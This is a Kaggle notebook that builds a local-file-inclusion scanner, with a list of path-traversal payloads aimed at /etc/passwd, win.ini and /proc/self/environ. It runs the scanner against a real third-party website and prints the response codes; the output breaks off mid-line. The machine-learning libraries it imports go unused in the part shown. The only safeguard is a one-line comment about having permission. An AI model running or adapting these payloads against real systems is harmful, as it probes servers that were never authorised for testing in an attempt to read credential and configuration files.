In [34]:
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load

import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)

# Input data files are available in the read-only "../input/" directory
# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory

import os
for dirname, _, filenames in os.walk('/kaggle/input'):
    for filename in filenames:
        print(os.path.join(dirname, filename))

# You can write up to 20GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using "Save & Run All" 
# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session

In [35]:
# Installing required libraries
!pip install requests beautifulsoup4 scikit-learn


In [1]:
# Import necessary libraries
import requests
import pandas as pd
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score

# LFI payloads to test
lfi_payloads = [
    "../../etc/passwd",
    "../../../../../../../../etc/passwd",
    "admin/login.php",
    "../etc/passwd",
    "../../../../etc/passwd",
    "../../windows/win.ini",
    "../../../../../../../../windows/win.ini",
    "../windows/win.ini",
    "../../../../windows/win.ini",
    "../../proc/self/environ",
    "../../../../../../../../proc/self/environ",
    "../proc/self/environ",
    "../../../../proc/self/environ"
]

# Function to test for LFI vulnerabilities by checking if the page is accessible
def test_lfi(url):
    response_data = []

    # Check if the base URL is accessible
    try:
        base_response = requests.get(url, timeout=10)
        if base_response.status_code != 200:
            print(f"Base page not accessible: {url} (Status Code: {base_response.status_code})")
            return []
    except requests.exceptions.RequestException as e:
        print(f"Error accessing base URL: {e}")
        return []

    # Test by directly appending payloads to the base URL path
    for payload in lfi_payloads:
        # Construct URL by directly appending payload
        test_url = f"{url.rstrip('/')}/{payload}"
        
        try:
            # Send the request
            response = requests.get(test_url, timeout=10)
            
            # Check if the page is accessible (HTTP status code 200)
            if response.status_code == 200:
                response_data.append((test_url, "Accessible", 1))
                print(f"Page Accessible :{test_url}")
            else:
                response_data.append((test_url, "Not Accessible", 0))
                print(f" PageNot Accessible): {test_url} (Status Code: {response.status_code})")
                
        except requests.exceptions.RequestException as e:
            print(f"Error testing payload {payload}: {e}")

    return response_data

# Example URL to test (Ensure you have permission to test this)
url_to_test = "https://thescipub.com"
collected_data = test_lfi(url_to_test)



 PageNot Accessible): https://thescipub.com/../../etc/passwd (Status Code: 404)
 PageNot Accessible): https://thescipub.com/../../../../../../../../etc/passwd (Status Code: 404)
Page Accessible :https://thescipub.com/admin/login.php
 PageNot Accessible): https://thescipub.com/../etc/passwd (Status Code: 404)
 PageNot Accessible): https://thescipub.com/../../../../etc/passwd (Status Code: 404)
 PageNot Accessible): https://thescipub.com/../../windows/win.ini (Status Code: 404)
 PageNot Accessible): https://thescipub.com/../../../../../../../../windows/win.ini (Status Code: 404)
 PageNot Accessible): https://thescipub.com/../windows/win.ini (Status Code: 404)
 PageNot Accessible): https://thescipub.com/../../../../windows/win.ini (Status Code: 404)
 PageNot Accessible): https://thescipub.com/../../proc/self/environ (Status Code: 404)
 PageNot Accessible): https://thescipub.com/../../../../../../../../proc/self/environ (Status Code: 404)
 PageNot Accessible): https://thescipub.com/../proc